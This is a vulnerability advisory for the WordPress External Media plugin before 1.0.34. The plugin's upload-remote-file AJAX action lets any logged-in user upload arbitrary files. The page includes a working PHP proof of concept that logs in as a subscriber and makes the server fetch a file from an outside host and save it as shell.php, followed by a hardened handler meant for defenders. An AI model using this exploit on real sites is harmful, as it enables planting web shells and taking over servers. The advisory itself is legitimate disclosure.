WordPress Plugin Vulnerabilities

External Media < 1.0.34 - Authenticated Arbitrary File Upload

Description

The plugin's wp_ajax_upload-remote-file AJAX action allowed any authenticated user to upload arbitrary files.

Proof of Concept

<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Upload File
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'url' => 'https://EXTERNALSITEHOSTINGFILE/shell.txt',
    'plugin' => 'ExternalLink',
    'filename' => 'shell.php',
    'caption' => '',
    'referer' => '',
    'action' => 'upload-remote-file'

]);

$output = curl_exec($ch);
curl_close($ch);
echo $output;

?>
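
For defenders, the checks whose absence makes this kind of handler exploitable can be seen in a hardened version of the same AJAX action. This is an added example, not the External Media plugin's code or its 1.0.34 fix (which this page does not show); it assumes it runs inside WordPress, and the `em_` function prefix, the `nonce` field and the `em_upload_remote_file` nonce action are hypothetical names.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's own code.
// Assumes WordPress is loaded; 'em_' names and the nonce action are assumptions.
add_action('wp_ajax_upload-remote-file', 'em_safe_upload_remote_file');

function em_safe_upload_remote_file() {
    // 1. CSRF: reject requests without a valid nonce (dies with 403 on failure).
    check_ajax_referer('em_upload_remote_file', 'nonce');

    // 2. Authorization: a wp_ajax_* hook only proves the caller is logged in.
    //    Subscribers lack the 'upload_files' capability, so they stop here.
    if (!current_user_can('upload_files')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    $url      = esc_url_raw(wp_unslash($_POST['url'] ?? ''));
    $filename = sanitize_file_name(wp_unslash($_POST['filename'] ?? ''));

    // 3. Only fetch http(s) URLs that WordPress considers safe to request.
    if (!$url || !wp_http_validate_url($url)) {
        wp_send_json_error(['message' => 'Invalid URL'], 400);
    }

    // 4. The caller-supplied name must map to a MIME type this user may upload.
    //    'shell.php' has no entry in the allowed list, so 'ext' is false.
    $type = wp_check_filetype($filename);
    if (!$type['ext']) {
        wp_send_json_error(['message' => 'File type not allowed'], 400);
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';

    // 5. Download to a temp file, then let core sideload it: media_handle_sideload()
    //    re-validates the file against its name before moving it into uploads.
    $tmp = download_url($url);
    if (is_wp_error($tmp)) {
        wp_send_json_error(['message' => 'Download failed'], 502);
    }
    $id = media_handle_sideload(['name' => $filename, 'tmp_name' => $tmp], 0);
    if (is_wp_error($id)) {
        @unlink($tmp); // do not leave a rejected download on disk
        wp_send_json_error(['message' => $id->get_error_message()], 400);
    }
    wp_send_json_success(['attachment_id' => $id]);
}
```

With these checks in place, the request in the proof of concept above fails at step 2 for a subscriber account and at step 4 for the `shell.php` filename.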

Affects Plugins

Fixed in 1.0.34

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Verified
Yes

Timeline

Publicly Published
2021-05-13
Added
2021-05-13
Last Updated
2021-05-14
